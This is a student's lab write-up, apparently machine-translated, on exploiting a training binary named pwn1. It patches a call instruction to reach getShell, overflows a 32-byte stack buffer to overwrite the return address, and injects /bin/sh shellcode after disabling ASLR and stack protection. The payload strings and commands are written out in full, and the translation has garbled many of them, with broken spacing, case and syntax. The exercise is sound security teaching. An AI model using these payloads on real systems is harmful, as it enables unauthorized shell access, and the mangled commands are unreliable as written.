Exp1 PC platforms reverse break
table of Contents
- Content Experiments
- Machine instructions directly modify the program, change the program execution flow directly jumps to getShell function.
- Bof using the function foo vulnerability, an attacker construct input string, overwriting the return address, trigger getShell function.
- Injecting a shellcode to produce their own and run this shellcode.
- Experimental procedures and results
- Problems and Solutions
- Experiences and thinking
1. The machine instructions directly modify the program, change the flow of execution
- First, download pwn1.zip , then unzip pwn1 extracting file, get pwn1 . Then the file backup, and named 20175221pwn2
- The pwn2 Disassembly: objdump -d 20175221pwn2 , to give the following code:
- First, the main function was observed 80484b5 portion, E8 indicates call command, i.e., jump, jump to the foo function. Our task is to modify the machine instructions to change the order of execution of the function.
- The goal is getShell function observed getShell address of the function 0804847d , with the foo function address 08048491 difference of (hex): 14
- call assembler instructions in machine code "d7 ff ff ff" four bytes numerical part, required shift amount "eip" register representing instructions jump when added
- Therefore, we want to jump from target foo becomes a function getShell function, it would need to be byte section d7 minus the offset 14, modified to c3
- Followed by step changes:
- vi 20175221pwn2 command mode
- Input :!% Xxd file displayed in hexadecimal
- In the bottom line of the input / E8 D7 (intermediate space) to find the corresponding at
- i into insert mode, d7 modify c3. After completion Esc
- After :!% Xxd -r revert to the original format
- : wq save and exit
- Again disassemble 20175221pwn2 , observed call instruction has been called correctly getShell function
- Then run to give Shell Prompt
2. The structure of the input parameters, resulting in BOF attack, changing the program execution flow
- First analysis of the code, found Buffer overflow vulnerability function foo
- foo function reads the string, but the system is reserved only for the xx-byte buffer, the excess can cause overflow, our goal is to overwrite the return address
- call call foo, while the pressure on the value of the return address on the stack 0x80484ba
- Then we enter gdb mode, enter the following regular string overflow
- info r See eip the value of the register, it can be seen four consecutive 5 (ASCII) where input error generated
- The original eight 5 replaced by "12345678" to try to confirm what a few characters to overflow eip
- We observed "34333231", i.e., the original input "1234" to reverse overflow eip. Thus the system can be drawn aside only 32-byte buffer, an overflow will cause excess
- Therefore, we can first enter any string of 32 bytes, then the input address getShell 0x0804847d overwrite the return address. The small end of the storage, we entered after the address byte 32 should be \ x7d \ x84 \ x04 \ x08
- Next, the file needs to be generated comprising such a string, the input value is constructed. Use perl -e ' Print "11111111222222223333333344444444 \ X7d \ X84 \ x04 \ x08 \ x0a" ' > the INPUT command configuration file
- Whether to use a hex viewer to view instructions xxd input file in line with expectations
- After confirmation with (cat input; cat) | ./20175221pwn3 to the string as input executable file
3. Fill Shellcode execution
- shellcode is simply a period of machine instructions:
- This general purpose machine instruction is to obtain an interactive shell (linux the shell, cmd.exe under windows), so this is referred to as machine instructions shellcode.
- In practical applications, usually for injecting the machine instructions are known as the shellcode, as adding a user, an instruction to run.
- First make the following settings:
-
APT- GET install execstack // install execstack execstack -s pwn1 // closed stack execution protection execstack -q pwn1 // query whether an executable file stack More / proc / SYS / Kernel / randomize_va_space // query whether to close the address randomization echo " 0 " > / proc / SYS / Kernel / randomize_va_space // close the address randomization More / proc / SYS / Kernel / randomize_va_space // query whether to close the address randomization
- Preparatory work is complete, the write shellcode code based buffer size: If the buffer is large enough, then the shellcode code into buffer; or a small buffer, shellcode put on the return address, and then return to the first address to the buffer address
- Run pwn1, then open another terminal, PS -ef | grep pwn1 view this process, the discovery process number 3779
- gdb debugging the process, disassemble foo disassembly function foo, then 0x080484a5 set the breakpoint. Knock box in pwn1 running Terminal, then enter the gdb debugging terminal
c
continues to run. - info r esp See esp stack pointer address, X / 16x 0xffffd34c view the contents of the 16-byte hexadecimal address followed 0xffffd34c form
- Seen from FIG
01020304
address belongs to0xffffd34c
, the address of the injected shellcode of four bytes should be in a position after the ret instruction address, i.e. 0xffffd34c + 0x00000004 = 0xffffd350 exit gdb. - Shellcode teacher will provide the code to modify Perl -e ' Print "A" 32 X; Print "\ X50 \ XD3 \ xFF \ xFF \ X90 \ X90 \ X90 \ X90 \ X90 \ X90 \ X31 \ XC0 \ X50 \ X68 \ x2f \ x2f \ x73 \ x68 \ x68 \ x2f \ x62 \ x69 \ x6e \ x89 \ xe3 \ x50 \ x53 \ x89 \ xe1 \ x31 \ xd2 \ xb0 \ x0b \ xcd \ x80 \ x90 \ x00 \ xd3 \ xff \ xFF \ x00 " ' > input_shellcode
- Enter the command (cat input_shellcode; cat) | ./pwn1
- Successful attack!
-
Problems and solutions encountered:
- Question 1: APT- GET install execstack download, encounters E: ....... (forget the screenshots ..).
- Problem Solution 1: Baidu a moment, Vmware is not connect to the Internet, so before the start of the third part, again get a bit kali's network to continue downloading
- Question 2: When the last third part, shellcode finished entering run, ls always mistakes, repeatedly checking is not calculated or enter issues
- Problem Solution 2: Turn off the terminal and re-opened. Reopening Dafa to solve my problems for a long time. I'm not sure why (this may be the shellcode will be repeated?'Ve got a second question, the third question must be switched off in order to get a new terminal reopen the shellcode? Do not know, hope that teachers can help solve the case)
-
Thinking and experience:
-
Feelings and experiences:
- Principal compilation principles and structure have been studied as well as machine code instructions related content, but when the time to learn and not particularly deep feelings, probably because there is no practical application of theoretical knowledge, stack, registers and the like is still very confused. The second person to achieve a buffer overflow attack, so I have a deeper understanding of the stack, the stack is to understand how to be covered by the malicious code, then cover how to jump, jump and then how to perform, and so on. Also learned to modify the machine code, as well as some additional instructions. Harvest is still getting bigger.
-
What is the vulnerability? Vulnerability What is the harm?
- Vulnerabilities are weaknesses in the system or the presence of a defect, the possibility of system sensitivity to specific threats or dangerous incidents, attacks or the threat of action.
- Through this experiment, I think is a buffer overflow vulnerability in program design, without taking into account the input exceeds the stack space allocated, thus exploited by attackers to cause. Exploit this vulnerability, an attacker could be exploited by attackers to enter the command line, thus the attacker perform any operation; or leave the back door, so that the relevant malicious code, Trojans implantation.